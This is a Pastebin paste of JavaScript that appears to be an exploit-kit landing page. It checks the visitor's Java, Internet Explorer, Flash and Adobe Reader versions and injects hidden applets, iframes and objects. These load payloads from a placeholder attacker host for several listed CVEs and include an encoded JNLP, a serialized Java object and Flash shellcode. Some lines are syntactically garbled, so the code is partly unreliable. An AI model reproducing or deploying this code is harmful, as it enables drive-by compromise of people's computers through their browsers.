Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- Multi-purpose functions
- */
- function EmbedPayload(payload_code) {
- var payload_div = window.document.createElement('div');
- window.document.body.appendChild(payload_div);
- payload_div.innerHTML = payload_code;
- }
- function GenActiveXObject(ax_objects) {
- if (typeof window.ActiveXObject != 'undefined')) {
- for (var i = 0; i < ax_objects.length; i++) {
- try {
- var nax_obj = new ActiveXObject(ax_objects[i]);
- if (nax_obj) return nax_obj
- } catch (exc) {}
- }
- }
- return null
- }
- function CheckStrForInts(g) {
- return (typeof g == 'string' && (/\d/).test(g));
- }
- function ExtractVersionNumbers(vers_string) {
- var integer_matches = CheckStrForInts(vers_string) ? RegExp('[\d][\d\.\_,-]*', '').exec(vers_string) : null;
- return integer_matches ? integer_matches[0].replace(RegExp('[\.\_,-]', 'g'), ',') : null
- }
- /*
- Oracle Java Exploitation
- */
- if (window.navigator.plugins.length || window.ActiveXObject || window.navigator.javaEnabled()) {
- function GetJavaVersion() {
- var jvms = null;
- try {
- var java_object_class_ids = ['clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA', 'clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'];
- for (var clsid = 0; clsid < java_object_class_ids.length; clsid++) {
- var java_object = window.document.createElement('object');
- java_object.classid = java_object_class_ids[clsid];
- window.document.body.appendChild(java_object);
- if (typeof java_object.jvms != 'undefined') {
- jvms = java_object.jvms;
- break
- }
- }
- if (jvms != null && jvms.getLength() != 0) {
- var version_str = ExtractVersionNumbers(jvms.get(jvms.getLength() - 1).version).split(/[\.\_,-]/g).concat(['0', '0', '0', '0']);
- while (version_str[3].length < 2) {
- version_str[3] = '0' + version_str[3]
- }
- return parseInt(version_str[1].concat(version_str[3]))
- }
- } catch (exc) {}
- return null
- }
- var java_version = GetJavaVersion();
- function Java_Exploit_1() {
- if (window.navigator.javaEnabled()) {
- if (java_version > 630 && java_version < 646) { // CVE-2013-2463
- var payload = "<applet archive='http://<domain>.tld/zxj3iyd/?1950629bd060b3665e56570b04090d52070b020b02500959040b010255560001' code='mowazo' width=10 height=10><param name='med' value='http://<domain>.tld/zxj3iyd/?6a97e0f87979312555195c0c570b520800530e0c5152560303530d0506545f5b;1;4@@'/></applet>";
- EmbedPayload(payload)
- } else if (java_version >= 700 && java_version < 718) { // CVE-2013-1493
- var payload = "<applet width=10 height=10><param name='med' value='http://<domain>.tld/zxj3iyd/?6a97e0f87979312555195c0c570b520800530e0c5152560303530d0506545f5b;1;4@@'/><param name='jnlp_href' value='a.jnlp'/><param name='jnlp_embedded' value='PD94bWwgdmVyc2lvbj0nMS4wJyBlbmNvZGluZz0ndXRmLTgnPz48am5scCBzcGVjPScxLjAnIHhtbG5zOmpmeD0naHR0cDovL2phdmFmeC5jb20nIGhyZWY9J2Euam5scCc+PGluZm9ybWF0aW9uPjx0aXRsZT5hPC90aXRsZT48dmVuZG9yPmE8L3ZlbmRvcj48L2luZm9ybWF0aW9uPjxyZXNvdXJjZXM+PGoyc2UgdmVyc2lvbj0nMS43KycgaHJlZj0naHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hdXRvZGwvajJzZScvPjxqYXIgaHJlZj0naHR0cDovL2RlaWRmb29sb3dpbmdob29nLnVzL3p4ajNpeWQvPzE5NTA2MjliZDA2MGIzNjY1ZTU2NTcwYjA0MDkwZDUyMDcwYjAyMGIwMjUwMDk1OTA0MGIwMTAyNTU1NjAwMDEnIG1haW49J3RydWUnLz48L3Jlc291cmNlcz48YXBwbGV0LWRlc2MgbmFtZT0nYScgbWFpbi1jbGFzcz0nbW93YXpvJyB3aWR0aD0nMTAnIGhlaWdodD0nMTAnPjxwYXJhbSBuYW1lPSdfX2FwcGxldF9zc3ZfdmFsaWRhdGVkJyB2YWx1ZT0ndHJ1ZSc+PC9wYXJhbT48L2FwcGxldC1kZXNjPjwvam5scD4='/></applet>";
- EmbedPayload(payload)
- }
- }
- return
- }
- Java_Exploit_1();
- // CVE-2012-0507
- function Java_Exploit_2() {
- if ((java_version && java_version < 631) || (!java_version && window.navigator.javaEnabled())) {
- var payload = "<applet archive='http://<domain>.tld/zxj3iyd/?694ce1b111ccfee5574b5558570a5601000b03585153520a030b005106555b52' code='jabher' width=10 height=10><param name='ski' value='http://<domain>.tld/zxj3iyd/?0bf013f579793125531a030b030852050650510b0551560e0550520252575f56;1;2@@'/><param name='lox' value='aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200065b4c61726d3bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003'/></applet>";
- EmbedPayload(payload)
- }
- return
- }
- Java_Exploit_2();
- /*
- Microsoft Internet Explorer Exploitation
- */
- function TestBrowserVersion() {
- try {
- var useragent = window.navigator.userAgent.toLowerCase();
- var msie = /MSIE[\/\s]\d+/useragent .test(useragent);
- var win64 = /Win64;/useragent .test(useragent);
- var trident = /Trident\/(\d)/useragent .test(useragent) ? parseInt(RegExp.$1) : null;
- if (!win64 && msie && trident && (trident == 6 || trident == 5 || trident == 4)) {
- return true
- }
- } catch (exc) {}
- return false
- }
- // CVE-2013-2551
- function MSIE_Exploit() {
- var pa;
- if (TestBrowserVersion()) {
- pa = window.document.createElement('iframe');
- pa.frameBorder = '0';
- pa.width = 10;
- pa.height = 10;
- pa.src = "http://<domain>.tld/zxj3iyd/?2a59067246c00d795b045902020d030204530202045407090753010b53520e51";
- window.document.body.appendChild(pa)
- }
- return
- }
- MSIE_Exploit();
- /*
- Adobe ShockwaveFlash Exploitation
- */
- function GetFlashVersion() {
- var return_version = null;
- var flash_obj = GenActiveXObject('ShockwaveFlash.ShockwaveFlash');
- if (flash_obj) {
- try {
- var flash_version = flash_obj.GetVariable('$version');
- flash_version = flash_version.split(' ')[1].split(',');
- return_version = flash_version.slice(0, 3).join('');
- while (return_version.length < 6) {
- return_version += '0'
- }
- return [return_version, flash_version[3]]
- } catch (exc) {}
- }
- return null
- }
- // CVE-2013-0634
- function Flash_Exploit() {
- var flash_version = GetFlashVersion();
- if (flash_version != null && flash_version[0] < 116000) {
- var payload = "<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10><param name='movie' value='http://<domain>.tld/zxj3iyd/?0d0e4853496a38d04313565e060301030656075e005a050805560457575c0c50'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='ooh=60eb1c5a89d689d7803ee9740bb981030000ac34f9aae2faffd2618d65d4c3e8dfffffff10f2faf9f9a7ac701c919697f9f9918c8b9594ad9177b7f71591ee33d29711adfbf9f9a0a0919c16b6fca91169fbf9f9a993ff93f991e2ff31f4911fc38ed711cafbf9f9c8224ee993b9aaaa93f991ad33566891ee33d29711e3fbf9f96e919878203691ee33d29711f3fbf9f9c5ff85e9aaae1144f9f9f97905d984fd93f812fb93f9afae117cf9f9f9af748dbeff1196f9f9f97c398caf93f2a0b08da9a87a8401f88de3af116af8f9f97c398ce3c8399d72b9e172b9cdc41dfbf9f98c22af112bf9f9f97c398d28a0a7c839bfc1bf068c03c1ff8c55aebebe9fc0fe8c003efec2f9c8f9748effa611ecf9f9f9303a93f99307916196b6c4910b228d54118df8f9f9c830a8a8aaafaea806ac053aac701c93f991dcf9aaf97019068cf5a9068cf19187b37a2e910b228d5411bff8f9f9303bf1f9ac701cafae478e12f2d8a9ad93f1930691f65ee7a0af11def8f9f9a3681ac57284f1a9ad068cf5ae93e0ab91a3972222af11f5f8f9f968a11ad806ce9134758e08af1102f9f9f9f64ff1b0a806ce91cb87ffd9af1110f9f9f972f168a6a7303bf1f9afaeac701c728ce9afbf9f7ac7f98c007487fa11e8f9f9f9d69ad98a8d988b8dd9dbdbd9dbdc8adbf9ae11b0060606748dbefbaeaf9187b37a2e910b228d541165f9f9f993c5a0d03574843da8aec8390a53a676fe938a9197f998f9918bf98cf9709ef591f80cec9b91ff1b54cb1194f9f9f970bef111e9f9f9f99af994f99df9d7f99cf981f99cf9f9f976bee9708eedae912421d7059103836c1d11c6f9f9f930a6a73bfdf9ac701c93ada0d035ae748455aec8390a53a674b6e993bd76f8aea8a9a9a9a9a9a9a9068cf19171074aef91ee33d29711fcf9f9f9a6303bfdf9a011f0f9f9f9a911c4f9f9f9a8061999c8399d72a9c972abf572abed728bd1c806c83955bf7c398df4c59885fbd5d93836f4f83e1212c285dddd72bbe972eb8c2270bddde5983bfdf9997295dddd72bcc572adfc81f81372b3e172a3d9f8121acdb072cd72f817c806c83905557d398dfe3836f4f83e120dc285ddd18c1872a3ddf8129f72f5b272a3e5f81272fd72f81170bddde5983bf1f91109050606918d8d89c3d6d69d9c909d9f969695968e90979e9196969ed78c8ad6838193ca90809dd6c6cdcccec09d9dcfc09ac0cdcdcfcaceccccc8cd9dcccbc9cbcccfcc9fc9cbc9c0c9cbc9cec9c9c9cbccc9c9cfc9cfc9cbc9c8c9cec9cac99bc9cec9c9c99fcc98c2c8c2caf9f9f9'/><param name='Play' value='true'/></object>";
- EmbedPayload(payload)
- }
- return
- }
- Flash_Exploit();
- /*
- Adobe PDF Exploitation
- */
- function GetMimeType(s) {
- var mime_plugin = null;
- var ret_mimeobj = null;
- var mimeobj = window.navigator.mimeTypes[s];
- if (mimeobj) {
- mime_plugin = mimeobj.enabledPlugin;
- if (mime_plugin && (mime_plugin.name || mime_plugin.description)) {
- ret_mimeobj = mimeobj
- }
- }
- return ret_mimeobj
- }
- function CheckMimeType(mtype, regex_pattern) {
- var ret_mimeobj = null;
- var regex = RegExp(regex_pattern, 'i');
- var mimeobj = GetMimeType(mtype);
- if (mimeobj && (mimeobj = mimeobj.enabledPlugin) && (regex.test(mimeobj.description || '') || regex.test(mimeobj.name || ''))) {
- ret_mimeobj = mimeobj;
- }
- return ret_mimeobj;
- }
- function CheckMimePluginAvailability(plugins, plugin_type, regex_pattern) {
- var result = false;
- for (var i in plugins) {
- if (plugins[i] && plugins[i].type && plugins[i].type == plugin_type) {
- result = true;
- break;
- }
- }
- if (!result && CheckMimeType(plugin_type, regex_pattern)) {
- result = true;
- }
- return result
- }
- function JoinAdobePDFVersionNumbers(version_string) {
- var version_integer = null;
- if (CheckStrForInts(version_string)) {
- var stripped_version = version_string.replace(/\s/g, '').split(RegExp('[\.\_,-]', 'g')).concat(['0', '0', '0', '0']);
- for (var i = 0; i < 4; i++) {
- if (/^(0+)(.+)$/ .test(stripped_version[i])) {
- stripped_version[i] = RegExp.$2
- }
- if (i > 3 || !(/\d/).test(stripped_version[i])) {
- stripped_version[i] = '0'
- }
- }
- version_integer = stripped_version.slice(0, 4).join('')
- }
- return version_integer
- }
- function GetAdobePDFVersion() {
- var ec;
- var adobe_pdf_version = null;
- var version_string = null;
- var adobe_pdf_tag_regexp = 'Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in';
- ec = CheckMimeType('application/pdf', adobe_pdf_tag_regexp);
- if (ec) {
- version_string = ExtractVersionNumbers(ec.description) || ExtractVersionNumbers(ec.name);
- if (!version_string) {
- if (CheckMimePluginAvailability(ec, 'application/vnd.adobe.pdfxml', adobe_pdf_tag_regexp)) {
- version_string = '9'
- } else {
- if (CheckMimePluginAvailability(ec, 'application/vnd.adobe.x-mars', adobe_pdf_tag_regexp)) {
- version_string = '8'
- }
- }
- }
- if (!version_string && !RegExp('opera', 'i').test(window.navigator.userAgent)) {
- version_string = '8'
- }
- }
- if (typeof window.ActiveXObject != 'undefined') {
- ec = GenActiveXObject(['AcroPDF.PDF', 'PDF.PdfCtrl']);
- var version_string_regexp = RegExp('=\s*([\d\.]+)', 'g');
- try {
- var pdf_object = window.document.createElement('object');
- pdf_object.setAttribute('classid', 'clsid:CA8A9780-280D-11CF-A24D-444553540000');
- pdf_object.setAttribute('src', '');
- var pdf_versions = (ec || pdf_object).GetVersions();
- for (var i = 0; i < 5; i++) {
- if (version_string_regexp.test(pdf_versions) && (!version_string || RegExp.$1 > version_string)) {
- version_string = RegExp.$1
- }
- }
- } catch (exc) {}
- }
- if (version_string) {
- adobe_pdf_version = JoinAdobePDFVersionNumbers(version_string)
- }
- return adobe_pdf_version
- }
- // CVE-2011-2104
- function AdobePDF_Exploit() {
- var adobe_pdf_version = GetAdobePDFVersion();
- if ((adobe_pdf_version >= 8000 && adobe_pdf_version < 8201) || (adobe_pdf_version >= 9000 && adobe_pdf_version < 9301)) {
- var payload = "<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' width=10 height=10><param name='src' value='http://<domain>.tld/zxj3iyd/?3dde2cf765b468345f0d065e005852070556535e0601560c0656505751075f54'/><embed src='http://<domain>.tld/zxj3iyd/?3dde2cf765b468345f0d065e005852070556535e0601560c0656505751075f54' type='application/pdf' width=10 height=10></embed></object>";
- EmbedPayload(payload)
- }
- return
- }
- AdobePDF_Exploit();
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement